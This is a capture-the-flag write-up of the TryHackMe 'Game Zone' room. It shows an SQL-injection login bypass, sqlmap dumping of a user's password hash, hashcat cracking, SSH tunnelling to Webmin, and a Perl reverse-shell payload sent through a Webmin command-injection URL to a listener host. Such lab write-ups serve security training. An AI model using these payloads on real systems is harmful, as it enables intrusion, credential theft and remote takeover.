Room Link: https://tryhackme.com/room/gamezone

Introduction

This room will cover SQLi (exploiting this vulnerability manually and via SQLMap), cracking users hashed passwords, using SSH tunnels to reveal a hidden service, and using a Metasploit payload to gain root privileges.

Scanning & Enumeration

Nmap Scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 03:52 IST
Nmap scan report for 10.10.244.64
Host is up (0.41s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/8%OT=22%CT=1%CU=38043%PV=Y%DS=4%DC=T%G=Y%TM=5F2DD460
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11
OS:NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(
OS:R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   152.33 ms 10.4.0.1
2   ... 3
4   414.32 ms 10.10.244.64
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.91 seconds

As we already know we only have HTTP and ssh.

Enumeration

HTTP Enumeration

Landing Page

The guy with the sniper looks like a hitman, but still no perfect hit. Let us see if the name of the image reveals this info.

Image Path

Let us use reverse image search option on google.

Reverse Image Search

We notice a login screen. Since we know that the room is going to have SQL injection, we can try to use sqli on the login form, my favourite is

admin'or'1'='1';--

I set this value for both username and password and wait for the results.

In case you are wondering how to learn more about sqli, this is a really great resource - Audi-1 SQL Injection Labs

Search Portal after Logging In

Vulnerability Analysis

After successful login, we see a search portal. Let us try to insert ' here and see what happens

Error Message after entering ' in input box

We see that error message is being displayed. We already used SQL injection to bypass authentication, and the error messages here make it more apparent.

Exploitation

We see the source code of the search form

Source code of Search Form

We find out that the request being made is a POST request, and the id is ‘searchitem’.

Thus we need to use sqlmap for a post request.
If you are wondering, what is sqlmap, it is an automated script that is very helpful during penetration tests, here is a link.

For POST Request, we got the following blog : https://hackertarget.com/sqlmap-post-request-injection/

Copying those steps …

1. Set-up burp and intercept the POST request

Intercepted POST request

2. Copy this request to a text file, lets call it ‘search.txt’.
3. We can turn off burp now. And run sqlmap with sqlmap -r search.txt -p searchitem

Directly copy-pasting did not work for me. So I went to HTTP History. And then choose ‘copy to file’. Once we do that, ‘sqlmap -r search.txt -p searchitem’ should work.

Found Vulnerable Parameter

We see that the parameter is vulnerable.

adding --tables gives us a list of all tables in different databases.

List of tables

This one looks like has more information

But before that I know that we can also try to spawn a shell using --os-shell

It asks us for programming language info, we can check that

Wappalyzer output

it supports PHP, well looks like we do not have write permissions.

Let us see the contents of the database — db

sqlmap -r search.txt -p searchitem -D db --tables
[04:41:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[04:41:22] [INFO] fetching tables for database: 'db'
Database: db
[2 tables]
+-------+
| post  |
| users |
+-------+

For ‘post’ we see that there are 5 entries and for users, there is just one.

[04:42:59] [WARNING] no clear password(s) found                                                                                                                                                                                              
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd                                                              | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |
+------------------------------------------------------------------+----------+

Using hash-identifier to identify the hash type

We use hash-identifier to identify the type of hash. Most likely it is SHA-256

To find the password, we can use hashcat. This website has all the examples for breaking different types of hashes.

We see that SHA-256 uses a hash-code of 1400. Hash-code is used by hashcat to select the hashing algorithm and use a wordlist to crack it.

Easier Option is to just visit this website: https://md5decrypt.net/en/Sha256/#answer
and enter the encrypted password.

Cracked the password

Just in case if we still want to use hashcat, here is how to proceed.

hashcat -m 1400 -a 0 digest.txt /usr/share/wordlists/rockyou.txt

Cracked Password using hashcat

Now that we have the password, let us try to ssh on the machine using agent47 as username and videogamer124 as the password.

SSH on target machine using the cracked credentials

And we were able to successfully log in.

Privesc

Source: https://tryhackme.com/room/gamezone

Reading this gives us some information about how SSH port forwarding works.

Let us see which sockets are open on the machine.

Local service not exposed on the network

Talking about TCP, we know 3306 is MySQL, 22 is ssh and 80 is web. We do not know what exists on 10000.

When we try to connect, it says that connection is refused. Let’s use ssh forwarding.

ssh -L 10000:localhost:10000 [email protected]

SSH Port Forwarding

Once we have this, let’s check our localhost:10000, and see what exists.

Webmin Landing Page

We see a login portal again. Let’s try to use our ssh credentials here, woooooot! It works.

Webmin Dashboard

Then we try to search this on Searchsploit

Searchsploit search results

We find one Metasploit module. Let’s try google

webmin exploit search results

Rapid7 is essentially Metasploit results and viewing that page shows how it can be used to exploit the Webmin.

Exploit Module Options

Even exploitDB refers to the Metasploit module here

Exploit Database Page

The best we can do now is look at the code, and try to figure out what this exploit is all about.

Exploit Source Code

This part is mostly about meta-data. We see different descriptions being set, also we notice that it is Remote Command Execution.

Reading through the exploit suggests that it is an Authenticated Remote Code Execution

We see that it is Privileged. We see the Payload option here. It is using cmd for Unix and Perl.

Analysing Exploit Source Code

Next, we see how the checks are being done, 1&2 are used to check if we have the correct authentication, and 3&4 tries to check if ‘/file/show.cgi/bin/{something random}’ returns a status code of 200 or not. A return status code of 200 means that the resource was found on the server. The 200 status here indicates that the version is vulnerable.

Let us see the exploit section. Metasploit gets the username and password and checks if we can successfully authenticate.

Continuing, we see that an encoded payload is stored as ‘command’ which is then used to send a request to

/file/show.cgi/bin/#{something_random}|#{command}|

If you are thinking like I am, I think we can generate a payload, and manually hit the URL and catch the spawned shell using netcat, otherwise, we have Metasploit at our disposal anyways :P

We can either use msfvenom to build our payload or simply pass the command for a reverse shell on to the server. Let’s use the Pentest Monkey reverse shell cheat sheet (link) and we copy the Perl script for the reverse shell.

perl -e 'use Socket;$i="10.4.9.255";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

We need to add our listener IP and port ( here 10.4.9.255 and 4444 respectively ) and use the format with our netcat listening on 4444.

/file/show.cgi/bin/<random>|<cmd>|

Running the Exploit

We finally get the root shell! Adding the complete URL here just in case someone is trying…

http://localhost:10000/file/show.cgi/bin/A%7Cperl%20-e%20'use%20Socket;$i=%2210.4.9.255%22;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i))))%7Bopen(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);%7D;'%7C

I was curious to know what this show.cgi was, so I tried to look for the file on the server as user ‘agent47’

List of files that have show.cgi in their name

Source Code of show.cgi

This suggests that show.cgi can also be used to get all files on the server, and since we are root, we can essentially get everything from the system.

Let us see if we can actually get files on the system.

Contents of /etc/passwd

And we were able to do that.

Parting Thoughts

Sometimes reading source code of msf modules for exploits can help us leverage that information to get shells.
We learned SSH port forwarding and yet another way to Privesc !!

I have skipped the PoC for Metasploit, but I have added the steps in a screenshot above.

Feedbacks are really appreciated. Thank you for reading, and if this helped you in any way, share it with others :)